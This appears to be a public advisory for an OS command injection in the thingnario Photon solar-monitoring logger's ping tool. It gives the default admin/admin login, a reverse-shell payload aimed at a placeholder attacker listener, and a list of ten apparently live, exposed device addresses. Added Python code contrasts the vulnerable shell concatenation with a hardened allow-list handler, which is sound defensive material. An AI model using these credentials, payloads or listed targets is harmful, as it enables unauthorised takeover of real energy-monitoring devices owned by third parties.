[CVE ID]
CVE-2023-46055
[PRODUCT]
thingnario-photon
[VERSION]
1.0
[VULN TYPE]
Remote Command Execution (OS command injection)
[DESCRIPTION]
https://www.thingnario.com/
The thingnario PV Monitoring Solution's Photon product collects data and alerts from solar power plants and immediately forwards them through an API to a display platform, so users receive production data and alarms without delay. The product is sold in Taiwan and Southeast Asia.
The vulnerability lies in the product's data collector (logger). The vendor's support article below describes the data collector, and the default password is exposed in it.
https://thingnario-service.zendesk.com/hc/zh-tw/articles/13402230828185-%E5%A6%82%E4%BD%95%E5%B0%87%E8%B3%87%E6%96%99%E8%92%90%E9%9B%86%E5%99%A8%E8%A8%AD%E5%AE%9A%E7%82%BA%E5%9B%BA%E5%AE%9AIP-
This vulnerability allows an attacker to log in to the backend of the "thingnario Logger Maintenance Webpage" with the well-known weak default credentials admin/admin; exposed instances can be found with fofa/shodan.
The ping function in the backend application does not validate, filter or escape user-supplied input; it passes the input directly to the underlying system command. An attacker can therefore use the ping function to inject arbitrary OS commands.
poc: click "Network Setting" ---> "ping tool" and enter "127.0.0.1|" or "127.0.0.1 &&" followed by the command to execute, for example (IP/port is the attacker's listener):
127.0.0.1|bash -i >& /dev/tcp/IP/port 0>&1
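As an added example (not the advisory's or the vendor's code, whose source is not public), the vulnerable pattern the advisory describes and a hardened replacement. The command string `ping -c 4 <target>`, the function names and the allow-list grammar are assumptions; the PoC payloads are the ones quoted above, with the listener IP/port left as placeholders.

```python
"""Added example: a web 'ping tool' that concatenates user input into a shell
command, beside a hardened handler that validates the target and avoids the
shell.  Not the vendor's code; command string and names are assumptions."""
import ipaddress
import re
import subprocess

# Strict hostname grammar (RFC 1123 labels). No shell metacharacter can pass it.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

# Payloads from the advisory (listener IP/port kept as placeholders).
POC_PAYLOADS = [
    "127.0.0.1|bash -i >& /dev/tcp/IP/port 0>&1",
    "127.0.0.1 && id",
]


def vulnerable_ping_command(target: str) -> str:
    """Assumed vulnerable pattern: user input is concatenated into a shell
    string. Under shell=True, '|' or '&&' terminates the ping command and the
    attacker's tail runs as a second command with the web server's privileges."""
    return f"ping -c 4 {target}"


def run_vulnerable_ping(target: str) -> subprocess.CompletedProcess:
    """Executes the string through /bin/sh. Never call this with untrusted
    input; it exists only to make the failure mode concrete."""
    return subprocess.run(vulnerable_ping_command(target), shell=True,
                          capture_output=True, text=True)


def is_valid_ping_target(target: str) -> bool:
    """Allow-list check: an IPv4/IPv6 literal or an RFC 1123 hostname.
    Anything else (spaces, '|', '&', ';', '$', backticks, newlines) is
    rejected outright rather than escaped."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(target))


def safe_ping_argv(target: str, count: int = 4) -> list:
    """Hardened form: validate first, then build an argv list so no shell is
    involved and the target is always exactly one argument to ping."""
    if not is_valid_ping_target(target):
        raise ValueError(f"rejected ping target: {target!r}")
    if not 1 <= count <= 10:
        raise ValueError("count out of range")
    return ["ping", "-c", str(count), target]


def run_safe_ping(target: str) -> subprocess.CompletedProcess:
    """Runs ping without a shell; raises ValueError on a bad target."""
    return subprocess.run(safe_ping_argv(target), shell=False,
                          capture_output=True, text=True)


if __name__ == "__main__":
    for payload in POC_PAYLOADS:
        print("vulnerable shell string:", vulnerable_ping_command(payload))
        try:
            safe_ping_argv(payload)
        except ValueError as exc:
            print("hardened handler:", exc)
    print("hardened argv for 127.0.0.1:", safe_ping_argv("127.0.0.1"))
```

The hardened handler rejects rather than escapes: escaping metacharacters for one shell dialect is fragile, whereas an allow-list of address and hostname syntax plus an argv list (no `shell=True`) removes the shell from the path entirely, so even an unusual but valid hostname reaches ping as a single argument.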
living_example_url:
http://106.105.138.247
http://61.216.165.68
http://60.248.238.201
http://60.249.195.163
http://61.221.229.121
http://210.61.177.216
http://210.61.177.215
http://59.125.208.240
http://211.75.227.175
http://211.72.95.251
Source: gist GroundCTL2MajorTom/eef0d55f5df77cc911d84392acdbf625 (file: advisory_thingnario_photon)